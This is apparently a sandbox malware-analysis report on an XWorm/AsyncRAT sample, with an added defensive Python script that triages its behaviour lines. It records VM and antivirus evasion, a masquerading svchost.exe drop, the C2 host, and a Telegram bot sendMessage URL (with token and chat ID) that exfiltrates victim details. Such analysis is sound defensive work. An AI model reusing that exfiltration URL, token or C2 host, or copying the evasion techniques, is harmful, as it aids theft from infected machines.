                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    Source: C:\Users\user\Desktop\yF21ypxRB7.exe; WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController (x25)
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exe; Memory allocated: BA0000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exe; Memory allocated: 1A8A0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\svchost.exe; Memory allocated: 2940000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\svchost.exe; Memory allocated: 1A940000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\svchost.exe; Memory allocated: 32A0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\svchost.exe; Memory allocated: 1B2A0000 memory reserve | memory write watch
                    Source: C:\Windows\System32\svchost.exe; File opened / queried: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exe; Thread delayed: delay time: 922337203685477 (x2)
                    Source: C:\Users\user\AppData\Roaming\svchost.exe; Thread delayed: delay time: 922337203685477 (x4)
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exe; Window / User API: threadDelayed 1599
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exe; Window / User API: threadDelayed 8237
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exe TID: 7496; Thread sleep time: -6456360425798339s >= -30000s
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exe TID: 7508; Thread sleep count: 1599 > 30
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exe TID: 7508; Thread sleep count: 8237 > 30
                    Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 7608; Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 7808; Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\svchost.exe; File opened: PhysicalDrive0
                    Source: C:\Windows\System32\conhost.exe; Last function: Thread delayed
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exe; File Volume queried: C:\ FullSizeInformation (x22)
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exe; File Volume queried: unknown FullSizeInformation
                    Source: C:\Windows\System32\svchost.exe; File Volume queried: C:\ FullSizeInformation (x3)
                    Source: C:\Windows\System32\svchost.exe; File Volume queried: C:\Windows\System32 FullSizeInformation
                    Source: C:\Users\user\AppData\Roaming\svchost.exe; File Volume queried: C:\ FullSizeInformation (x2)
                    Source: svchost.exe, 00000005.00000002.3700982634.000001EDEF664000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
                    Source: svchost.exe, 00000005.00000002.3700982634.000001EDEF681000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                    Source: yF21ypxRB7.exe, 00000000.00000002.3704179728.000000001B938000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllO
                    Source: svchost.exe, 00000005.00000002.3700982634.000001EDEF664000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: (@SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000Ad
                    Source: svchost.exe, 00000005.00000002.3700396624.000001EDEF602000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcUmRdpServiceDsSvcfhsvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionsvsvcStorSvcWwanSvcvmicvssDevQueryBrokerNgcSvcsysmainNetmanTabletInputServicePcaSvcDisplayEnhancementServiceIPxlatCfgSvcDeviceAssociationServiceNcbServiceEmbeddedModeSensorServicewlansvcCscServiceWPDBusEnumMixedRealityOpenXRSvc
                    Source: svchost.exe, 00000005.00000002.3700982634.000001EDEF664000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
                    Source: svchost.exe, 00000005.00000002.3701142771.000001EDEF68E000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                    Source: svchost.exe, 00000005.00000002.3700647003.000001EDEF62B000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: @\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                    Source: svchost.exe, 00000005.00000002.3700765508.000001EDEF64D000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: #Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                    Source: svchost.exe, 00000007.00000002.3700643698.000001FE6DA31000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exe; Process information queried: ProcessInformation
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exe; Process token adjusted: Debug
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exe; Memory allocated: page read and write | page guard
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exe; Queries volume information: C:\Users\user\Desktop\yF21ypxRB7.exe VolumeInformation
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exe; Queries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\svchost.exe; Queries volume information: C:\ VolumeInformation (x6)
                    Source: C:\Windows\System32\svchost.exe; Queries volume information: C: VolumeInformation (x2)
                    Source: C:\Users\user\AppData\Roaming\svchost.exe; Queries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformation (x2)
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                    Lowering of HIPS / PFW / Operating System Security Settings

                    Source: C:\Windows\System32\svchost.exe; Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Provider\Av\{D68DDC3A-831F-4fae-9E44-DA132C1ACF46} STATE
                    Source: svchost.exe, 00000006.00000002.3701472363.0000011719502000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: gramFiles%\Windows Defender\MsMpeng.exe
                    Source: yF21ypxRB7.exe, 00000000.00000002.3705285429.000000001C5E0000.00000004.00000020.00020000.00000000.sdmp, yF21ypxRB7.exe, 00000000.00000002.3704179728.000000001B9DE000.00000004.00000020.00020000.00000000.sdmp, yF21ypxRB7.exe, 00000000.00000002.3704179728.000000001B938000.00000004.00000020.00020000.00000000.sdmp, yF21ypxRB7.exe, 00000000.00000002.3700338414.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.3701472363.0000011719502000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exe; WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct (x24)
                    Source: C:\Windows\System32\svchost.exe; WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
                    Source: C:\Program Files\Windows Defender\MpCmdRun.exe; WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct (x2)
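The two sections above (system evasion and security-software discovery) are the observations an analyst has to sort through most often in a report like this one. What follows is an added example, not code from the report or from Joe Sandbox: a Python triage script that parses behaviour lines of the "Source: <process>; <observation>" form used on this page, discards lines whose originating process is the OS's own System32 svchost.exe or Defender's MpCmdRun.exe (the report attributes the Security Center WMI subscription and the AntiVirusProduct enumeration to those components, not to the sample), and flags the remaining patterns seen in this run: a system process name executing from a user profile directory, Win32_VideoController queries used as a VM check, AntivirusProduct enumeration, the 922337203685477 ms thread delay, sleep loops over the report's "> 30" threshold, and the MachineGuid read. The sample lines are constructed from the entries above, and the directory lists, thresholds and technique labels are the example's own assumptions.

```python
"""Triage of Joe Sandbox style behaviour lines (added example, not report or Joe Sandbox code)."""
import re
from collections import Counter
from dataclasses import dataclass

# Constructed lines modelled on the report entries above; not a live capture.
SAMPLE_LINES = [
    r"Source: C:\Users\user\Desktop\yF21ypxRB7.exe; WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController",
    r"Source: C:\Users\user\Desktop\yF21ypxRB7.exe; WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct",
    r"Source: C:\Users\user\AppData\Roaming\svchost.exe; Thread delayed: delay time: 922337203685477",
    r"Source: C:\Users\user\Desktop\yF21ypxRB7.exe TID: 7508; Thread sleep count: 8237 > 30",
    r"Source: C:\Users\user\Desktop\yF21ypxRB7.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid",
    r"Source: C:\Windows\System32\svchost.exe; File opened: PhysicalDrive0",
    r"Source: C:\Program Files\Windows Defender\MpCmdRun.exe; WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct",
]

# Assumption: processes in these directories are the OS or Defender reacting to the sample, not the sample.
TRUSTED_DIRS = {"c:\\windows\\system32", "c:\\program files\\windows defender"}
# Assumption: the only legitimate homes for the system binaries listed in SYSTEM_NAMES.
SYSTEM_DIRS = {"c:\\windows\\system32", "c:\\windows\\syswow64"}
SYSTEM_NAMES = {"svchost.exe", "csrss.exe", "lsass.exe", "winlogon.exe", "explorer.exe"}
# WMI classes commonly read to recognise a virtual machine (assumed list).
VM_WMI_CLASSES = ("win32_videocontroller", "win32_computersystem", "win32_bios", "win32_diskdrive")

TIMESPAN_MAX_MS = (2**63 - 1) // 10_000   # .NET TimeSpan.MaxValue in whole milliseconds
LONG_SLEEP_MS = 60_000                     # assumption: a sleep over a minute inside a sandbox run is suspicious
SLEEP_LOOP_MIN = 30                        # same threshold the report applies to "sleep count"

LINE_RE = re.compile(r"^Source:\s+(?P<proc>.+?\.exe);?\s+(?P<obs>.*)$", re.IGNORECASE)
WMI_RE = re.compile(r"(?:ExecQuery|CreateInstanceEnum)\s*-\s*(?P<ns>[\w\\]+)\s*:\s*(?P<query>.+)", re.IGNORECASE)
DELAY_RE = re.compile(r"delay time:\s*(\d+)", re.IGNORECASE)
SLEEP_COUNT_RE = re.compile(r"sleep count:\s*(\d+)", re.IGNORECASE)


@dataclass
class Finding:
    process: str
    technique: str
    detail: str


def split_process(proc):
    """Return (directory, file name), both lower-cased, for a Windows path."""
    directory, _, name = proc.rpartition("\\")
    return directory.lower(), name.lower()


def classify(line):
    """Map one behaviour line to zero or more findings."""
    m = LINE_RE.match(line.strip())
    if not m:
        return []
    proc, obs = m.group("proc"), m.group("obs")
    directory, name = split_process(proc)
    if directory in TRUSTED_DIRS:
        return []                      # OS / Defender activity; not attributed to the sample
    found = []
    if name in SYSTEM_NAMES and directory not in SYSTEM_DIRS:
        found.append(Finding(proc, "masquerading", name + " started from " + directory))
    w = WMI_RE.search(obs)
    if w:
        ns, query = w.group("ns").lower(), w.group("query").lower()
        if "securitycenter" in ns and "antivirusproduct" in query:
            found.append(Finding(proc, "security-software-discovery", query))
        elif any(cls in query for cls in VM_WMI_CLASSES):
            found.append(Finding(proc, "vm-detection", query))
    d = DELAY_RE.search(obs)
    if d:
        ms = int(d.group(1))
        if ms >= TIMESPAN_MAX_MS:
            found.append(Finding(proc, "infinite-sleep", "%d ms equals .NET TimeSpan.MaxValue" % ms))
        elif ms > LONG_SLEEP_MS:
            found.append(Finding(proc, "long-sleep", "%d ms" % ms))
    s = SLEEP_COUNT_RE.search(obs)
    if s and int(s.group(1)) > SLEEP_LOOP_MIN:
        found.append(Finding(proc, "sleep-loop", s.group(1) + " short sleeps in one thread"))
    if "machineguid" in obs.lower():
        found.append(Finding(proc, "host-fingerprint", "reads HKLM\\SOFTWARE\\Microsoft\\Cryptography\\MachineGuid"))
    return found


def triage(lines):
    """Classify every line; return the findings and a per-technique count."""
    findings = [f for line in lines for f in classify(line)]
    return findings, Counter(f.technique for f in findings)


if __name__ == "__main__":
    findings, counts = triage(SAMPLE_LINES)
    for f in findings:
        print(f"{f.technique:28} {f.process}  {f.detail}")
    print(dict(counts))
```

On the sample lines the script yields six findings and drops the two trusted-origin lines. The 922337203685477 ms delay is flagged separately because it is exactly (2^63 - 1) / 10000 rounded down, i.e. .NET's TimeSpan.MaxValue expressed in milliseconds: a thread parked for that long is not waiting for anything, which is why the report counts it as evasion rather than as a timing loop. The trusted-directory filter is deliberately an exact match on the directory, so a copy of svchost.exe in any other location, such as the AppData\Roaming copy dropped here, still produces a masquerading finding.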

                    Stealing of Sensitive Information

                    Source: Yara match; File source: Process Memory Space: yF21ypxRB7.exe PID: 6312, type: MEMORYSTR (x2)
                    Source: Yara match; File source: sslproxydump.pcap, type: PCAP
                    Source: Yara match; File source: yF21ypxRB7.exe, type: SAMPLE
                    Source: Yara match; File source: 0.0.yF21ypxRB7.exe.470000.0.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 00000000.00000000.1245680814.0000000000472000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara match; File source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPED

                    Remote Access Functionality

                    Source: Yara match; File source: Process Memory Space: yF21ypxRB7.exe PID: 6312, type: MEMORYSTR (x2)
                    Source: Yara match; File source: sslproxydump.pcap, type: PCAP
                    Source: Yara match; File source: yF21ypxRB7.exe, type: SAMPLE
                    Source: Yara match; File source: 0.0.yF21ypxRB7.exe.470000.0.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 00000000.00000000.1245680814.0000000000472000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara match; File source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPED
                    MITRE ATT&CK matrix: techniques flagged for this sample, by tactic (the digits are the signature-count badges that precede each technique in the report, kept as extracted; unflagged template cells are omitted)
                    Reconnaissance: none flagged
                    Resource Development: none flagged
                    Initial Access: none flagged
                    Execution: Windows Management Instrumentation (11)
                    Persistence: Windows Service (1); Registry Run Keys / Startup Folder (21); DLL Side-Loading (1)
                    Privilege Escalation: Windows Service (1); Process Injection (1); Registry Run Keys / Startup Folder (21); DLL Side-Loading (1)
                    Defense Evasion: Masquerading (11); Disable or Modify Tools (11); Virtualization/Sandbox Evasion (151); Process Injection (1); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (11); Software Packing (2)
                    Credential Access: Input Capture (1)
                    Discovery: Security Software Discovery (241); Process Discovery (1); Virtualization/Sandbox Evasion (151); Application Window Discovery (1); File and Directory Discovery (1); System Information Discovery (23)
                    Lateral Movement: none flagged
                    Collection: Input Capture (1); Archive Collected Data (11)
                    Command and Control: Web Service (1); Encrypted Channel (11); Non-Standard Port (1); Ingress Tool Transfer (1); Non-Application Layer Protocol (2); Application Layer Protocol (13)
                    Exfiltration: none flagged
                    Impact: none flagged
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                    DLL Side-Loading
                    Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Behavior Graph ID: 1557207; Sample: yF21ypxRB7.exe; Startdate: 17/11/2024; Architecture: WINDOWS; Score: 100

Start
  DNS/IP: api.telegram.org; perfect-invest.gl.at.ply.gg; time.windows.com
  Signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 15 other signatures
  Processes started: yF21ypxRB7.exe; svchost.exe; svchost.exe; 5 other processes
api.telegram.org
  Signature: Uses the Telegram API (likely for C&C communication)
yF21ypxRB7.exe
  DNS/IP: perfect-invest.gl.at.ply.gg (147.185.221.23, 49700, 49725, 49786; SALSGIVERUS, United States); api.telegram.org (149.154.167.220, 443, 49699; TELEGRAMRU, United Kingdom)
  File dropped: C:\Users\user\AppData\Roaming\svchost.exe, PE32
  Signatures: Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); Drops PE files with benign system names
svchost.exe (first instance)
  Signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file
svchost.exe (second instance)
  Signature: Changes security center settings (notifications, updates, antivirus, firewall)
  Process started: MpCmdRun.exe
MpCmdRun.exe
  Process started: conhost.exe

Source | Detection | Scanner | Label
yF21ypxRB7.exe | 79% | ReversingLabs | ByteCode-MSIL.Spyware.AsyncRAT
yF21ypxRB7.exe | 100% | Avira | TR/Spy.Gen
yF21ypxRB7.exe | 100% | Joe Sandbox ML |

Source | Detection | Scanner | Label
C:\Users\user\AppData\Roaming\svchost.exe | 100% | Avira | TR/Spy.Gen
C:\Users\user\AppData\Roaming\svchost.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Roaming\svchost.exe | 79% | ReversingLabs | ByteCode-MSIL.Spyware.AsyncRAT
                    No Antivirus matches
Source | Detection | Scanner | Label
perfect-invest.gl.at.ply.gg | 100% | Avira URL Cloud | malware
http://www.bingmapsportal.comsv | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
perfect-invest.gl.at.ply.gg | 147.185.221.23 | true | true | | unknown
api.telegram.org | 149.154.167.220 | true | false | | high
time.windows.com | unknown | unknown | false | | high
Name | Malicious | Antivirus Detection | Reputation
https://api.telegram.org/bot7602273147:AAGPHHPgO8DxUDOWK0ZCgtSD_Rua_8wVzrE/sendMessage?chat_id=6589427579&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A95B5CEC98776D486C10E%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20CO53M%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.6 | false | | high
perfect-invest.gl.at.ply.gg | true | Avira URL Cloud: malware | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx | svchost.exe, 00000002.00000003.1366155081.0000027E79857000.00000004.00000020.00020000.00000000.sdmp; svchost.exe, 00000002.00000002.1366713689.0000027E79858000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1& | svchost.exe, 00000002.00000003.1366141378.0000027E79841000.00000004.00000020.00020000.00000000.sdmp; svchost.exe, 00000002.00000002.1366687714.0000027E79842000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://api.telegram.org/bot | yF21ypxRB7.exe; svchost.exe.0.dr | false | | high
https://dev.ditu.live.com/REST/v1/Routes/ | svchost.exe, 00000002.00000002.1366755363.0000027E79868000.00000004.00000020.00020000.00000000.sdmp; svchost.exe, 00000002.00000003.1365994412.0000027E79867000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://dev.virtualearth.net/REST/v1/Routes/Driving | svchost.exe, 00000002.00000003.1366155081.0000027E79857000.00000004.00000020.00020000.00000000.sdmp; svchost.exe, 00000002.00000002.1366713689.0000027E79858000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx | svchost.exe, 00000002.00000003.1366141378.0000027E79841000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://dev.ditu.live.com/REST/v1/Transit/Stops/ | svchost.exe, 00000002.00000002.1366782396.0000027E79877000.00000004.00000020.00020000.00000000.sdmp; svchost.exe, 00000002.00000003.1365876022.0000027E79875000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://dev.virtualearth.net/REST/v1/Routes/ | svchost.exe, 00000002.00000002.1366755363.0000027E79868000.00000004.00000020.00020000.00000000.sdmp; svchost.exe, 00000002.00000003.1365994412.0000027E79867000.00000004.00000020.00020000.00000000.sdmp; svchost.exe, 00000002.00000002.1366644805.0000027E7982B000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://dev.virtualearth.net/REST/v1/Traffic/Incidents/ | svchost.exe, 00000002.00000002.1366740763.0000027E79862000.00000004.00000020.00020000.00000000.sdmp; svchost.exe, 00000002.00000002.1366644805.0000027E7982B000.00000004.00000020.00020000.00000000.sdmp; svchost.exe, 00000002.00000003.1366021198.0000027E79861000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r= | svchost.exe, 00000002.00000003.1366127965.0000027E79848000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://dev.virtualearth.net/REST/v1/Routes/Walking | svchost.exe, 00000002.00000003.1366155081.0000027E79857000.00000004.00000020.00020000.00000000.sdmp; svchost.exe, 00000002.00000002.1366713689.0000027E79858000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://dynamic.api.tiles.ditu.live.com/odvs/gri?pv=1&r= | svchost.exe, 00000002.00000003.1366141378.0000027E79841000.00000004.00000020.00020000.00000000.sdmp; svchost.exe, 00000002.00000002.1366687714.0000027E79842000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log? | svchost.exe, 00000002.00000003.1366141378.0000027E79841000.00000004.00000020.00020000.00000000.sdmp; svchost.exe, 00000002.00000002.1366687714.0000027E79842000.00000004.00000020.00020000.00000000.sdmp; svchost.exe, 00000002.00000002.1366740763.0000027E79862000.00000004.00000020.00020000.00000000.sdmp; svchost.exe, 00000002.00000003.1366021198.0000027E79861000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r= | svchost.exe, 00000002.00000002.1366687714.0000027E79842000.00000004.00000020.00020000.00000000.sdmp; svchost.exe, 00000002.00000003.1366127965.0000027E79848000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://ecn.dev.virtualearth.net/REST/V1/MapControlConfiguration/native/ | svchost.exe, 00000002.00000003.1264330890.0000027E79836000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://dev.virtualearth.net/REST/v1/Locations | svchost.exe, 00000002.00000003.1366155081.0000027E79857000.00000004.00000020.00020000.00000000.sdmp; svchost.exe, 00000002.00000002.1366713689.0000027E79858000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://dev.ditu.live.com/REST/V1/MapControlConfiguration/native/ | svchost.exe, 00000002.00000002.1366740763.0000027E79862000.00000004.00000020.00020000.00000000.sdmp; svchost.exe, 00000002.00000003.1366021198.0000027E79861000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://dev.virtualearth.net/mapcontrol/logging.ashx | svchost.exe, 00000002.00000003.1366155081.0000027E79857000.00000004.00000020.00020000.00000000.sdmp; svchost.exe, 00000002.00000002.1366713689.0000027E79858000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://dev.ditu.live.com/mapcontrol/logging.ashx | svchost.exe, 00000002.00000003.1366155081.0000027E79857000.00000004.00000020.00020000.00000000.sdmp; svchost.exe, 00000002.00000002.1366713689.0000027E79858000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://dev.ditu.live.com/REST/v1/Imagery/Copyright/ | svchost.exe, 00000002.00000003.1366141378.0000027E79841000.00000004.00000020.00020000.00000000.sdmp; svchost.exe, 00000002.00000003.1366114410.0000027E79859000.00000004.00000020.00020000.00000000.sdmp; svchost.exe, 00000002.00000002.1366687714.0000027E79842000.00000004.00000020.00020000.00000000.sdmp; svchost.exe, 00000002.00000002.1366740763.0000027E79862000.00000004.00000020.00020000.00000000.sdmp; svchost.exe, 00000002.00000003.1365942027.0000027E7986E000.00000004.00000020.00020000.00000000.sdmp; svchost.exe, 00000002.00000002.1366768678.0000027E79870000.00000004.00000020.00020000.00000000.sdmp; svchost.exe, 00000002.00000003.1366021198.0000027E79861000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r= | svchost.exe, 00000002.00000002.1366644805.0000027E7982B000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r= | svchost.exe, 00000002.00000002.1366687714.0000027E79842000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://dev.virtualearth.net/REST/v1/Transit/Schedules/ | svchost.exe, 00000002.00000003.1366141378.0000027E79841000.00000004.00000020.00020000.00000000.sdmp; svchost.exe, 00000002.00000002.1366687714.0000027E79842000.00000004.00000020.00020000.00000000.sdmp | false | | high
